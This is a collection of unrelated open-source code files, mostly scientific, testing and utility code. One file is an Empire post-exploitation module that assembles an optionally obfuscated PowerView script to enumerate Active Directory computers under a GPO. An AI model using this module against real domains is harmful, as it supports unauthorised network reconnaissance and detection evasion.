i = 0
for idx in idxs.numpy():
if args.type == 'patch':
_, raw, _ = train_dataset[idx[0]]
data = raw.crop((
(idx[2] - args.patch_window // 2) * unit,
(idx[1] - args.patch_window // 2) * unit,
(idx[2] + args.patch_window // 2 + 1) * unit,
(idx[1] + args.patch_window // 2 + 1) * unit))
# filter too dark patch for visualization
hsv = np.array(data.convert('HSV'))
if hsv[..., -1].mean() <= 40:
continue
# draw highlight region
if args.patch_window > 1:
draw = ImageDraw.Draw(data, "RGBA")
draw.rectangle((
args.patch_window // 2 * unit,
args.patch_window // 2 * unit,
(args.patch_window // 2 + 1) * unit,
(args.patch_window // 2 + 1) * unit),
fill=(200, 100, 0, 127))
else:
_, data, _ = train_dataset[idx]
img.paste(data, (i % size * vis_unit, i // size * vis_unit))
i += 1
if i >= args.topk:
break
img.save(os.path.join(save_path, 'c{}_crank{}_cid{}_top{}.jpg'.format(args.type, nrank, cluster, args.topk)))
if __name__ == '__main__':
main() |
src/lightkurve/seismology/utils.py | jorgemarpa/lightkurve | 235 | 11087255 | """Generic classes and functions which aid the asteroseismology features."""
import numpy as np
import copy
from astropy import units as u
from astropy.units import Quantity
__all__ = ["SeismologyQuantity"]
class SeismologyQuantity(Quantity):
"""Holds an asteroseismic value including its unit, error, and estimation method.
Compared to a traditional AstroPy `~astropy.units.Quantity` object, this
class has the following extra attributes:
* name (e.g. 'deltanu' or 'radius');
* error (i.e. the uncertainty);
* method (e.g. specifying the asteroseismic scaling relation);
* diagnostics;
* diagnostics_plot_method.
"""
def __new__(
cls,
quantity,
name=None,
error=None,
method=None,
diagnostics=None,
diagnostics_plot_method=None,
):
# Note: Quantity is peculiar to sub-class because it inherits from numpy ndarray;
# see https://docs.astropy.org/en/stable/units/quantity.html#subclassing-quantity.
self = Quantity.__new__(cls, quantity.value)
self.__dict__ = quantity.__dict__
self.name = name
self.error = error
self.method = method
self.diagnostics = diagnostics
self.diagnostics_plot_method = diagnostics_plot_method
return self
def __repr__(self):
try:
return "{}: {} {} (method: {})".format(
self.name, "{:.2f}".format(self.value), self.unit.__str__(), self.method
)
except AttributeError: # Math operations appear to remove Seismic attributes for now
return super().__repr__()
def _repr_latex_(self):
try:
return "{}: {} {} (method: {})".format(
self.name,
"${:.2f}$".format(self.value),
self.unit._repr_latex_(),
self.method,
)
except AttributeError: # Math operations appear to remove Seismic attributes for now
return super()._repr_latex_()
def get_fwhm(periodogram, numax):
"""In a power spectrum of a solar-like oscillator, the power of the
    modes of oscillation will appear in a shape that looks approximately
    Gaussian, which for all basic purposes is referred to as the
'mode envelope'. For a given numax (the central frequency of the mode
envelope), the expected Full Width Half Maximum of the envelope is known
as a function of numax for evolved Red Giant Branch stars as follows
(see Mosser et al 2010):
fwhm = 0.66 * numax^0.88 .
If the maximum frequency in the periodogram is less than 500 microhertz,
this function will default to the above equation under the assumption it
    is dealing with an RGB star, which oscillates at lower frequencies.
If the maximum frequency is above 500 microhertz, the envelope is given
as a different function of numax (see Lund et al. 2017), as
fwhm = 0.25 * numax,
in which case the function assumes it is dealing with a main sequence
    star, which oscillates at higher frequencies.
Parameters
----------
numax : float
The estimated position of the numax of the power spectrum. This
is used to calculated the region autocorrelated with itself.
Returns
-------
fwhm: float
The estimate full-width-half-maximum of the seismic mode envelope
"""
# Calculate the index FWHM for a given numax
if u.Quantity(periodogram.frequency[-1], u.microhertz) > u.Quantity(
500.0, u.microhertz
):
fwhm = 0.25 * numax
else:
fwhm = 0.66 * numax ** 0.88
return fwhm
def autocorrelate(periodogram, numax, window_width=25.0, frequency_spacing=None):
"""An autocorrelation function (ACF) for seismic mode envelopes.
We autocorrelate a region with a width of `window_width` (in microhertz)
around a central frequency `numax` (in microhertz). The window size is
determined based on the location of the nyquist frequency when
estimating numax, and based on the expected width of the mode envelope
of the asteroseismic oscillations when calculating deltanu. The section of
power being autocorrelated is first resclaed by subtracting its mean, so
that its noise is centered around zero. If this is not done, noise will
appear in the ACF as a function of 1/lag.
Parameters:
----------
numax : float
The estimated position of the numax of the power spectrum. This
is used to calculated the region autocorrelated with itself.
window_width : int or float
The width of the autocorrelation window around the central
frequency numax.
frequency_spacing : float
The frequency spacing of the periodogram. If none is passed, it
is calculated internally. This should never be set by the user.
Returns:
--------
acf : array-like
The autocorrelation power calculated for the given numax
"""
if frequency_spacing is None:
frequency_spacing = np.median(np.diff(periodogram.frequency.value))
spread = int(window_width / 2 / frequency_spacing) # Find the spread in indices
x = int(numax / frequency_spacing) # Find the index value of numax
x0 = int(
(periodogram.frequency[0].value / frequency_spacing)
) # Transform in case the index isn't from 0
xt = x - x0
p_sel = copy.deepcopy(
periodogram.power[xt - spread : xt + spread].value
) # Make the window selection
p_sel -= np.nanmean(p_sel) # Make it so that the selection has zero mean.
C = np.correlate(p_sel, p_sel, mode="full")[
len(p_sel) - 1 :
] # Correlated the resulting SNR space with itself
return C
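if __name__ == "__main__":
    # Illustrative sketch, not part of lightkurve: exercise the helpers with a
    # toy stand-in for a Periodogram (only .frequency and .power are needed).
    # The numax and window_width values are arbitrary.
    from types import SimpleNamespace
    toy = SimpleNamespace(
        frequency=np.linspace(1, 300, 3000) * u.microhertz,
        power=np.random.rand(3000) * u.dimensionless_unscaled)
    print(get_fwhm(toy, 100.0))  # RGB branch: 0.66 * numax**0.88
    acf = autocorrelate(toy, numax=100.0, window_width=50.0)
    print(acf.shape)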
|
tests/presets/test_datapackage.py | JoeStaines/goodtables-py | 243 | 11087268 |
# -*- coding: utf-8 -*-
from __future__ import division
from __future__ import print_function
from __future__ import absolute_import
from __future__ import unicode_literals
import pytest
from copy import deepcopy
from goodtables import validate
from goodtables.presets.datapackage import datapackage
# Validate
@pytest.mark.parametrize('dp_path', [
'data/datapackages/valid/datapackage.json',
'data/datapackages/valid.zip',
])
def test_validate_datapackage_valid(log, dp_path):
report = validate(dp_path)
assert log(report) == []
@pytest.mark.parametrize('dp_path', [
'data/datapackages/invalid/datapackage.json',
'data/datapackages/invalid.zip',
])
def test_validate_datapackage_invalid(log, dp_path):
report = validate(dp_path)
assert log(report) == [
(1, 3, None, 'blank-row'),
(2, 4, None, 'blank-row'),
]
# Validate (integrity)
DESCRIPTOR = {
'resources': [
{
'name': 'resource1',
'path': 'data/valid.csv',
'bytes': 30,
'hash': 'sha256:a1fd6c5ff3494f697874deeb07f69f8667e903dd94a7bc062dd57550cea26da8',
}
]
}
def test_check_file_integrity(log):
source = deepcopy(DESCRIPTOR)
report = validate(source)
assert log(report) == []
def test_check_file_integrity_invalid(log):
source = deepcopy(DESCRIPTOR)
source['resources'][0]['bytes'] += 1
source['resources'][0]['hash'] += 'a'
report = validate(source)
assert report['tables'][0]['errors'] == [{
'code': 'source-error',
'message': 'Calculated size "30" and hash "a1fd6c5ff3494f697874deeb07f69f8667e903dd94a7bc062dd57550cea26da8" differ(s) from declared value(s)',
'message-data': {}
}]
def test_check_file_integrity_size(log):
source = deepcopy(DESCRIPTOR)
source['resources'][0]['hash'] = None
report = validate(source)
assert log(report) == []
def test_check_file_integrity_size_invalid(log):
source = deepcopy(DESCRIPTOR)
source['resources'][0]['bytes'] += 1
source['resources'][0]['hash'] = None
report = validate(source)
assert report['tables'][0]['errors'] == [{
'code': 'source-error',
'message': 'Calculated size "30" differ(s) from declared value(s)',
'message-data': {}
}]
def test_check_file_integrity_hash(log):
source = deepcopy(DESCRIPTOR)
source['resources'][0]['bytes'] = None
report = validate(source)
assert log(report) == []
def test_check_file_integrity_hash_invalid(log):
source = deepcopy(DESCRIPTOR)
source['resources'][0]['bytes'] = None
source['resources'][0]['hash'] += 'a'
report = validate(source)
assert report['tables'][0]['errors'] == [{
'code': 'source-error',
'message': 'Calculated hash "a1fd6c5ff3494f697874deeb07f69f8667e903dd94a7bc062dd57550cea26da8" differ(s) from declared value(s)',
'message-data': {}
}]
def test_check_file_integrity_not_supported_hash(log):
source = deepcopy(DESCRIPTOR)
source['resources'][0]['hash'] = 'not-supported-hash'
report = validate(source)
assert report['warnings'] == [
'Resource "resource1" does not use the SHA256 hash. The check will be skipped',
]
# Preset
def test_preset_datapackage():
warnings, tables = datapackage('data/datapackages/valid/datapackage.json')
assert len(warnings) == 0
assert len(tables) == 2
# Issues
def test_preset_datapackage_non_tabular_datapackage_issue_170():
warnings, tables = datapackage('data/non_tabular_datapackage.json')
assert len(warnings) == 0
assert len(tables) == 2
def test_preset_datapackage_mixed_datapackage_issue_170():
warnings, tables = datapackage('data/mixed_datapackage.json')
assert len(warnings) == 0
assert len(tables) == 2
def test_preset_datapackage_invalid_json_issue_192():
warnings, tables = datapackage('data/invalid_json.json')
assert len(warnings) == 1
assert len(tables) == 0
assert 'Unable to parse JSON' in warnings[0]
|
robosat/osm/core.py | iboates/robosat | 1,844 | 11087288 |
import os
import uuid
import geojson
class FeatureStorage:
"""Stores features on disk and handles batching.
Note: you have to call flush at the end to flush the last partial batch.
"""
def __init__(self, out, batch):
assert batch > 0
self.out = out
self.batch = batch
self.features = []
def add(self, feature):
if len(self.features) >= self.batch:
self.flush()
self.features.append(feature)
def flush(self):
if not self.features:
return
collection = geojson.FeatureCollection(self.features)
base, ext = os.path.splitext(self.out)
suffix = uuid.uuid4().hex
out = "{}-{}{}".format(base, suffix, ext)
with open(out, "w") as fp:
geojson.dump(collection, fp)
self.features.clear()
def is_polygon(way):
"""Checks if the way is a polygon.
Args
way: the osmium.osm.Way to check.
Returns:
True if the way is a polygon, False otherwise.
Note: The geometry shape can still be invalid (e.g. self-intersecting).
"""
if not way.is_closed():
return False
if len(way.nodes) < 4:
return False
return True
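if __name__ == "__main__":
    # Illustrative sketch, not part of robosat: buffer two made-up point
    # features and flush them to GeoJSON batches named features-<uuid>.geojson.
    storage = FeatureStorage(out="features.geojson", batch=1000)
    for i in range(2):
        feature = geojson.Feature(
            geometry=geojson.Point((7.44 + i * 0.01, 46.95)),
            properties={"id": i})
        storage.add(feature)
    storage.flush()  # flush the last partial batch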
|
apprise/plugins/NotifyXMPP/SleekXmppAdapter.py | linkmauve/apprise | 4,764 | 11087319 | # -*- coding: utf-8 -*-
import ssl
from os.path import isfile
import logging
# Default our global support flag
SLEEKXMPP_SUPPORT_AVAILABLE = False
try:
# Import sleekxmpp if available
import sleekxmpp
SLEEKXMPP_SUPPORT_AVAILABLE = True
except ImportError:
# No problem; we just simply can't support this plugin because we're
# either using Linux, or simply do not have sleekxmpp installed.
pass
class SleekXmppAdapter(object):
"""
Wrapper to sleekxmpp
"""
# Reference to XMPP client.
xmpp = None
# Whether everything succeeded
success = False
# The default protocol
protocol = 'xmpp'
# The default secure protocol
secure_protocol = 'xmpps'
# The default XMPP port
default_unsecure_port = 5222
# The default XMPP secure port
default_secure_port = 5223
# Taken from https://golang.org/src/crypto/x509/root_linux.go
CA_CERTIFICATE_FILE_LOCATIONS = [
# Debian/Ubuntu/Gentoo etc.
"/etc/ssl/certs/ca-certificates.crt",
# Fedora/RHEL 6
"/etc/pki/tls/certs/ca-bundle.crt",
# OpenSUSE
"/etc/ssl/ca-bundle.pem",
# OpenELEC
"/etc/pki/tls/cacert.pem",
# CentOS/RHEL 7
"/etc/pki/ca-trust/extracted/pem/tls-ca-bundle.pem",
]
# This entry is a bit hacky, but it allows us to unit-test this library
# in an environment that simply doesn't have the sleekxmpp package
# available to us.
#
# If anyone is seeing this had knows a better way of testing this
# outside of what is defined in test/test_xmpp_plugin.py, please
# let me know! :)
_enabled = SLEEKXMPP_SUPPORT_AVAILABLE
def __init__(self, host=None, port=None, secure=False,
                 verify_certificate=True, xep=None, jid=None, password=None,
body=None, targets=None, before_message=None, logger=None):
"""
Initialize our SleekXmppAdapter object
"""
self.host = host
self.port = port
self.secure = secure
self.verify_certificate = verify_certificate
self.xep = xep
self.jid = jid
self.password = password
self.body = body
self.targets = targets
self.before_message = before_message
self.logger = logger or logging.getLogger(__name__)
# Use the Apprise log handlers for configuring the sleekxmpp logger.
apprise_logger = logging.getLogger('apprise')
sleek_logger = logging.getLogger('sleekxmpp')
for handler in apprise_logger.handlers:
sleek_logger.addHandler(handler)
sleek_logger.setLevel(apprise_logger.level)
if not self.load():
raise ValueError("Invalid XMPP Configuration")
def load(self):
# Prepare our object
self.xmpp = sleekxmpp.ClientXMPP(self.jid, self.password)
# Register our session
self.xmpp.add_event_handler("session_start", self.session_start)
for xep in self.xep:
# Load xep entries
try:
self.xmpp.register_plugin('xep_{0:04d}'.format(xep))
except sleekxmpp.plugins.base.PluginNotFound:
self.logger.warning(
'Could not register plugin {}'.format(
'xep_{0:04d}'.format(xep)))
return False
if self.secure:
# Don't even try to use the outdated ssl.PROTOCOL_SSLx
self.xmpp.ssl_version = ssl.PROTOCOL_TLSv1
# If the python version supports it, use highest TLS version
# automatically
if hasattr(ssl, "PROTOCOL_TLS"):
# Use the best version of TLS available to us
self.xmpp.ssl_version = ssl.PROTOCOL_TLS
self.xmpp.ca_certs = None
if self.verify_certificate:
# Set the ca_certs variable for certificate verification
self.xmpp.ca_certs = next(
(cert for cert in self.CA_CERTIFICATE_FILE_LOCATIONS
if isfile(cert)), None)
if self.xmpp.ca_certs is None:
self.logger.warning(
                        'XMPP Secure communication can not be verified; '
'no local CA certificate file')
return False
# We're good
return True
def process(self):
"""
Thread that handles the server/client i/o
"""
# Establish connection to XMPP server.
# To speed up sending messages, don't use the "reattempt" feature,
# it will add a nasty delay even before connecting to XMPP server.
if not self.xmpp.connect((self.host, self.port),
use_ssl=self.secure, reattempt=False):
default_port = self.default_secure_port \
if self.secure else self.default_unsecure_port
default_schema = self.secure_protocol \
if self.secure else self.protocol
# Log connection issue
self.logger.warning(
'Failed to authenticate {jid} with: {schema}://{host}{port}'
.format(
jid=self.jid,
schema=default_schema,
host=self.host,
port='' if not self.port or self.port == default_port
else ':{}'.format(self.port),
))
return False
# Process XMPP communication.
self.xmpp.process(block=True)
return self.success
def session_start(self, *args, **kwargs):
"""
Session Manager
"""
targets = list(self.targets)
if not targets:
# We always default to notifying ourselves
targets.append(self.jid)
while len(targets) > 0:
# Get next target (via JID)
target = targets.pop(0)
# Invoke "before_message" event hook.
self.before_message()
# The message we wish to send, and the JID that will receive it.
self.xmpp.send_message(mto=target, mbody=self.body, mtype='chat')
# Using wait=True ensures that the send queue will be
# emptied before ending the session.
self.xmpp.disconnect(wait=True)
# Toggle our success flag
self.success = True
|
tests/gen_test.py | beatrizuezu/pycpfcnpj | 127 | 11087324 |
import unittest
from pycpfcnpj import gen, cpf, cnpj
class GenerateCPFTest(unittest.TestCase):
"""docstring for GenerateCPFTest"""
def setUp(self):
self.masked_valid_cpf = gen.cpf_with_punctuation()
    def test_validate_masked_cpf_true(self):
self.assertTrue(cpf.validate(self.masked_valid_cpf))
    def test_valid_cpf_without_mask_true(self):
cpf_result =(self.masked_valid_cpf.replace(".","")).replace("-","")
self.assertTrue(cpf.validate(cpf_result))
class GenerateCNPJTest(unittest.TestCase):
"""docstring for GenerateCNPJTest"""
def setUp(self):
self.masked_valid_cnpj = gen.cnpj_with_punctuation()
def test_validate_masked_cnpj_true(self):
self.assertTrue(cnpj.validate(self.masked_valid_cnpj))
def test_valid_cnpj_without_mask_true(self):
cnpj_result =(self.masked_valid_cnpj.replace(".","")).replace("-","")
self.assertTrue(cnpj.validate(cnpj_result)) |
基础教程/A2-神经网络基本原理/第5步 - 非线性分类/src/ch12-MultipleLayerNetwork/HelperClass2/ActivatorFunction_2_0.py | microsoft/ai-edu | 11,094 | 11087336 | # Copyright (c) Microsoft. All rights reserved.
# Licensed under the MIT license. See LICENSE file in the project root for full license information.
"""
Version 2.0
"""
import numpy as np
class CActivator(object):
    # z = matrix of w*x+b values computed by this layer
def forward(self, z):
pass
    # z = matrix of w*x+b values computed by this layer
    # a = matrix of this layer's activation outputs
    # delta = gradient matrix backpropagated from the next (later) layer
def backward(self, z, a, delta):
pass
# Pass-through function, equivalent to applying no activation
class Identity(CActivator):
def forward(self, z):
return z
def backward(self, z, a, delta):
return delta, a
class Sigmoid(CActivator):
def forward(self, z):
a = 1.0 / (1.0 + np.exp(-z))
return a
def backward(self, z, a, delta):
da = np.multiply(a, 1-a)
dz = np.multiply(delta, da)
return dz, da
class Tanh(CActivator):
def forward(self, z):
a = 2.0 / (1.0 + np.exp(-2*z)) - 1.0
return a
def backward(self, z, a, delta):
da = 1 - np.multiply(a, a)
dz = np.multiply(delta, da)
return dz, da
class Relu(CActivator):
def forward(self, z):
a = np.maximum(z, 0)
return a
    # Note: ReLU decides where the gradient is 1 from the forward value z = w*x+b (z > 0), not from a
def backward(self, z, a, delta):
da = np.zeros(z.shape)
da[z>0] = 1
dz = da * delta
return dz, da
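if __name__ == "__main__":
    # Quick illustrative check (not part of the original tutorial code):
    # run a small batch through Sigmoid forward/backward with delta of ones.
    z = np.array([[-1.0, 0.0, 2.0]])
    act = Sigmoid()
    a = act.forward(z)
    dz, da = act.backward(z, a, np.ones_like(a))
    print(a)   # sigmoid outputs
    print(dz)  # equals a * (1 - a) because delta is all ones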
|
empire/server/modules/powershell/situational_awareness/network/powerview/get_gpo_computer.py | chenxiangfang/Empire | 2,541 | 11087366 |
from __future__ import print_function
from builtins import object
from builtins import str
from typing import Dict
from empire.server.common import helpers
from empire.server.common.module_models import PydanticModule
from empire.server.utils import data_util
from empire.server.utils.module_util import handle_error_message
class Module(object):
@staticmethod
def generate(main_menu, module: PydanticModule, params: Dict, obfuscate: bool = False, obfuscation_command: str = ""):
# read in the common powerview.ps1 module source code
module_source = main_menu.installPath + "/data/module_source/situational_awareness/network/powerview.ps1"
try:
f = open(module_source, 'r')
except:
return handle_error_message("[!] Could not read module source path at: " + str(module_source))
module_code = f.read()
f.close()
# get just the code needed for the specified function
script = helpers.strip_powershell_comments(module_code)
script += "\nGet-DomainOU "
for option, values in params.items():
if option.lower() != "agent" and option.lower() != "guid" and option.lower() != "outputfunction":
if values and values != '':
if values.lower() == "true":
# if we're just adding a switch
script += " -" + str(option)
else:
script += " -" + str(option) + " " + str(values)
script += "-GPLink " + str(params['GUID']) + " | %{ Get-DomainComputer -SearchBase $_.distinguishedname"
for option, values in params.items():
if option.lower() != "agent" and option.lower() != "guid" and option.lower() != "outputfunction":
if values and values != '':
if values.lower() == "true":
# if we're just adding a switch
script += " -" + str(option)
else:
script += " -" + str(option) + " " + str(values)
outputf = params.get("OutputFunction", "Out-String")
script += f"}} | {outputf} | " + '%{$_ + \"`n\"};"`n' + str(module.name.split("/")[-1]) + ' completed!"'
if obfuscate:
script = helpers.obfuscate(main_menu.installPath, psScript=script, obfuscationCommand=obfuscation_command)
script = data_util.keyword_obfuscation(script)
return script
|
bin/tower.py | theosech/ec | 290 | 11087373 |
try:
import binutil # required to import from dreamcoder modules
except ModuleNotFoundError:
import bin.binutil # alt import if called as module
from dreamcoder.domains.tower.main import main, TowerCNN, tower_options
from dreamcoder.dreamcoder import commandlineArguments
from dreamcoder.utilities import numberOfCPUs
if __name__ == '__main__':
arguments = commandlineArguments(
featureExtractor=TowerCNN,
CPUs=numberOfCPUs(),
helmholtzRatio=0.5,
recognitionTimeout=3600,
iterations=6,
a=3,
structurePenalty=1,
pseudoCounts=10,
topK=2,
maximumFrontier=5,
extras=tower_options)
main(arguments)
|
test/effective_user_test.py | blekinge/snakebite | 691 | 11087383 | from minicluster_testbase import MiniClusterTestBase
from snakebite.client import Client
import os
class EffectiveUserTest(MiniClusterTestBase):
ERR_MSG_TOUCH = "org.apache.hadoop.security.AccessControlException\nPermission denied: user=__foobar"
ERR_MSG_STAT = "`/foobar2': No such file or directory"
VALID_FILE = '/foobar'
INVALID_FILE = '/foobar2'
def setUp(self):
self.custom_client = Client(self.cluster.host, self.cluster.port)
self.custom_foobar_client = Client(host=self.cluster.host,
port=self.cluster.port,
effective_user='__foobar')
def test_touch(self):
print tuple(self.custom_client.touchz([self.VALID_FILE]))
try:
tuple(self.custom_foobar_client.touchz([self.INVALID_FILE]))
except Exception, e:
self.assertTrue(e.message.startswith(self.ERR_MSG_TOUCH))
self.custom_client.stat([self.VALID_FILE])
try:
self.custom_client.stat([self.INVALID_FILE])
except Exception, e:
self.assertEquals(e.message, self.ERR_MSG_STAT)
|
recipes/train_rasa/examples_to_rasa.py | CvH/voice2json | 913 | 11087388 | #!/usr/bin/env python3
import sys
import json
from collections import defaultdict
examples_by_intent = defaultdict(list)
# Gather all examples by intent name
for line in sys.stdin:
example = json.loads(line)
intent_name = example["intent"]["name"]
examples_by_intent[intent_name].append(example)
# Write data in RasaNLU markdown training format
for intent_name, examples in examples_by_intent.items():
print(f"## intent:{intent_name}")
for example in examples:
# Create mapping from start/stop character indexes to example entities
entities_by_start = {e["raw_start"]: e for e in example["entities"]}
entities_by_end = {e["raw_end"]: e for e in example["entities"]}
# Current character index
char_idx = 0
# Final list of tokens that will be printed for the example
tokens_to_print = []
# Current entity
entity = None
# Tokens that belong to the current entity
entity_tokens = []
# Process "raw" tokens without substitutions
for token in example["raw_tokens"]:
if char_idx in entities_by_start:
# Start entity
entity = entities_by_start[char_idx]
entity_tokens = []
if entity is None:
# Use token as-is
tokens_to_print.append(token)
else:
# Accumulate into entity token list
entity_tokens.append(token)
# Advance character index in raw text
char_idx += len(token) + 1 # space
if (char_idx - 1) in entities_by_end:
# Finish entity
entity_str = entity["entity"]
if entity["value"] != entity["raw_value"]:
# Include substitution
entity_str += f":{entity['value']}"
# Create Markdown-style entity
token_str = "[" + " ".join(entity_tokens) + f"]({entity_str})"
tokens_to_print.append(token_str)
entity = None
# Print example
print("-", " ".join(tokens_to_print))
# Blank line between intents
print("")
|
panoptic_mapping_utils/src/flat_dataset/flat_data_player.py | ethz-asl/panoptic_mapping | 101 | 11087402 |
#!/usr/bin/env python3
import os
import json
import csv
import rospy
from sensor_msgs.msg import Image
from geometry_msgs.msg import PoseStamped
from cv_bridge import CvBridge
import cv2
from PIL import Image as PilImage
import numpy as np
import tf
from std_srvs.srv import Empty, EmptyResponse
from panoptic_mapping_msgs.msg import DetectronLabel, DetectronLabels
class FlatDataPlayer(object):
def __init__(self):
""" Initialize ros node and read params """
# params
self.data_path = rospy.get_param(
'~data_path', '/home/lukas/Documents/Datasets/flat_dataset/run1')
self.global_frame_name = rospy.get_param('~global_frame_name', 'world')
self.sensor_frame_name = rospy.get_param('~sensor_frame_name',
"depth_cam")
self.use_detectron = rospy.get_param('~use_detectron', False)
self.play_rate = rospy.get_param('~play_rate', 1.0)
self.wait = rospy.get_param('~wait', False)
self.max_frames = rospy.get_param('~max_frames', 1e9)
self.refresh_rate = 100 # Hz
# ROS
self.color_pub = rospy.Publisher("~color_image", Image, queue_size=100)
self.depth_pub = rospy.Publisher("~depth_image", Image, queue_size=100)
self.id_pub = rospy.Publisher("~id_image", Image, queue_size=100)
if self.use_detectron:
self.label_pub = rospy.Publisher("~labels",
DetectronLabels,
queue_size=100)
self.pose_pub = rospy.Publisher("~pose", PoseStamped, queue_size=100)
self.tf_broadcaster = tf.TransformBroadcaster()
# setup
self.cv_bridge = CvBridge()
stamps_file = os.path.join(self.data_path, 'timestamps.csv')
self.times = []
self.ids = []
self.current_index = 0 # Used to iterate through
if not os.path.isfile(stamps_file):
rospy.logfatal("No timestamp file '%s' found." % stamps_file)
with open(stamps_file, 'r') as read_obj:
csv_reader = csv.reader(read_obj)
for row in csv_reader:
if row[0] == "ImageID":
continue
self.ids.append(str(row[0]))
self.times.append(float(row[1]) / 1e9)
self.ids = [x for _, x in sorted(zip(self.times, self.ids))]
self.times = sorted(self.times)
self.times = [(x - self.times[0]) / self.play_rate for x in self.times]
self.start_time = None
if self.wait:
self.start_srv = rospy.Service('~start', Empty, self.start)
else:
self.start(None)
def start(self, _):
self.running = True
self.timer = rospy.Timer(rospy.Duration(1.0 / self.refresh_rate),
self.callback)
return EmptyResponse()
def callback(self, _):
# Check we should be publishing.
if not self.running:
return
# Check we're not done.
if self.current_index >= len(self.times):
rospy.loginfo("Finished playing the dataset.")
rospy.signal_shutdown("Finished playing the dataset.")
return
# Check the time.
now = rospy.Time.now()
if self.start_time is None:
self.start_time = now
if self.times[self.current_index] > (now - self.start_time).to_sec():
return
# Get all data and publish.
file_id = os.path.join(self.data_path, self.ids[self.current_index])
# Color.
color_file = file_id + "_color.png"
depth_file = file_id + "_depth.tiff"
pose_file = file_id + "_pose.txt"
files = [color_file, depth_file, pose_file]
if self.use_detectron:
pred_file = file_id + "_predicted.png"
labels_file = file_id + "_labels.json"
files += [pred_file, labels_file]
else:
pred_file = file_id + "_segmentation.png"
files.append(pred_file)
for f in files:
if not os.path.isfile(f):
rospy.logwarn("Could not find file '%s', skipping frame." % f)
self.current_index += 1
return
# Load and publish Color image.
cv_img = cv2.imread(color_file)
img_msg = self.cv_bridge.cv2_to_imgmsg(cv_img, "bgr8")
img_msg.header.stamp = now
img_msg.header.frame_id = self.sensor_frame_name
self.color_pub.publish(img_msg)
# Load and publish ID image.
cv_img = cv2.imread(pred_file)
img_msg = self.cv_bridge.cv2_to_imgmsg(cv_img[:, :, 0], "8UC1")
img_msg.header.stamp = now
img_msg.header.frame_id = self.sensor_frame_name
self.id_pub.publish(img_msg)
# Load and publish labels.
if self.use_detectron:
label_msg = DetectronLabels()
label_msg.header.stamp = now
with open(labels_file) as json_file:
data = json.load(json_file)
for d in data:
if 'instance_id' not in d:
d['instance_id'] = 0
if 'score' not in d:
d['score'] = 0
label = DetectronLabel()
label.id = d['id']
label.instance_id = d['instance_id']
label.is_thing = d['isthing']
label.category_id = d['category_id']
label.score = d['score']
label_msg.labels.append(label)
self.label_pub.publish(label_msg)
# Load and publish depth image. These are optional.
cv_img = PilImage.open(depth_file)
img_msg = self.cv_bridge.cv2_to_imgmsg(np.array(cv_img), "32FC1")
img_msg.header.stamp = now
img_msg.header.frame_id = self.sensor_frame_name
self.depth_pub.publish(img_msg)
# Load and publish transform.
if os.path.isfile(pose_file):
pose_data = [float(x) for x in open(pose_file, 'r').read().split()]
transform = np.eye(4)
for row in range(4):
for col in range(4):
transform[row, col] = pose_data[row * 4 + col]
rotation = tf.transformations.quaternion_from_matrix(transform)
self.tf_broadcaster.sendTransform(
(transform[0, 3], transform[1, 3], transform[2, 3]), rotation,
now, self.sensor_frame_name, self.global_frame_name)
pose_msg = PoseStamped()
pose_msg.header.stamp = now
pose_msg.header.frame_id = self.global_frame_name
pose_msg.pose.position.x = pose_data[3]
pose_msg.pose.position.y = pose_data[7]
pose_msg.pose.position.z = pose_data[11]
pose_msg.pose.orientation.x = rotation[0]
pose_msg.pose.orientation.y = rotation[1]
pose_msg.pose.orientation.z = rotation[2]
pose_msg.pose.orientation.w = rotation[3]
self.pose_pub.publish(pose_msg)
self.current_index += 1
if self.current_index > self.max_frames:
rospy.signal_shutdown("Played reached max frames (%i)" %
self.max_frames)
if __name__ == '__main__':
rospy.init_node('flat_data_player')
flat_data_player = FlatDataPlayer()
rospy.spin()
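# Expected on-disk layout, as inferred from the loader above: a 'timestamps.csv'
# with ImageID/timestamp rows, plus per-frame files named <ImageID>_color.png,
# <ImageID>_depth.tiff, <ImageID>_pose.txt (a row-major 4x4 transform) and either
# <ImageID>_segmentation.png or, when Detectron labels are used,
# <ImageID>_predicted.png together with <ImageID>_labels.json.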
|
lib/python/plash/macros/shortcuts.py | parampavar/plash | 346 | 11087406 | <gh_stars>100-1000
from plash.eval import eval, register_macro
ALIASES = dict(
x=[["run"]],
l=[["layer"]],
f=[["from"]],
    # Update on a best-effort basis. If possible keep versions that point to
    # the latest release.
A=[["from", "alpine:edge"], ["apk"]],
U=[["from", "ubuntu:focal"], ["apt"]],
F=[["from", "fedora:32"], ["dnf"]],
D=[["from", "debian:sid"], ["apt"]],
C=[["from", "centos:8"], ["yum"]],
R=[["from", "archlinux:current"], ["pacman"]],
G=[["from", "gentoo:current"], ["emerge"]],
)
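# Illustrative expansion (a sketch of what the generated alias functions do):
# calling the "A" macro with the arguments ["git", "vim"] evaluates
# [["from", "alpine:edge"], ["apk", "git", "vim"]], i.e. the same as
# --from alpine:edge --apk git vim on the plash command line.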
for name, macro in ALIASES.items():
def bounder(macro=macro):
def func(*args):
            # list(args) throws an exception for some really funny reason
# therefore the list comprehension
args = [i for i in args]
return eval(macro[:-1] + [macro[-1] + args])
func.__doc__ = "alias for: {}[ARG1 [ARG2 [...]]]".format(
" ".join("--" + i[0] + " " + " ".join(i[1:]) for i in macro)
)
return func
func = bounder()
register_macro(name=name, group="macros")(func)
|
docs/render_templates.py | ticlazau/deon | 223 | 11087438 | <reponame>ticlazau/deon
from pathlib import Path
import click
from click.testing import CliRunner
from jinja2 import Environment, FileSystemLoader
import yaml
from deon.cli import main as deon_command
from deon.formats import Markdown, EXTENSIONS
from deon.parser import Checklist
env = Environment(
loader=FileSystemLoader("md_templates"),
)
TEMPLATE_AND_OUTPUT = {
"index.tpl": Path("docs/index.md"),
"examples.tpl": Path("docs/examples.md"),
"readme.tpl": Path("../README.md"),
}
def create_context():
cl = Checklist.read(Path(__file__).absolute().parents[1] / "deon" / "assets" / "checklist.yml")
checklist_template = Markdown(cl)
rendered_checklist = checklist_template.render()
runner = CliRunner()
result = runner.invoke(deon_command, ["--help"])
table = make_table_of_links()
return {
"default_checklist": rendered_checklist,
"cli_options": result.output,
"supported_formats": EXTENSIONS,
"links_table": table,
}
def make_table_of_links():
"""
    Generates a table where the left-hand column contains checklist items (from checklist.yml) and the right-hand
    column contains hyperlinks to examples where things have gone wrong (from examples_of_ethical_issues.yml).
    The table appears in docs/docs/examples.md.
"""
root = Path(__file__).absolute().parents[1] / "deon" / "assets"
cl = Checklist.read(root / "checklist.yml")
with open(root / "examples_of_ethical_issues.yml", "r") as f:
refs = yaml.load(f, Loader=yaml.SafeLoader)
refs_dict = dict()
for r in refs:
refs_dict[r["line_id"]] = r["links"]
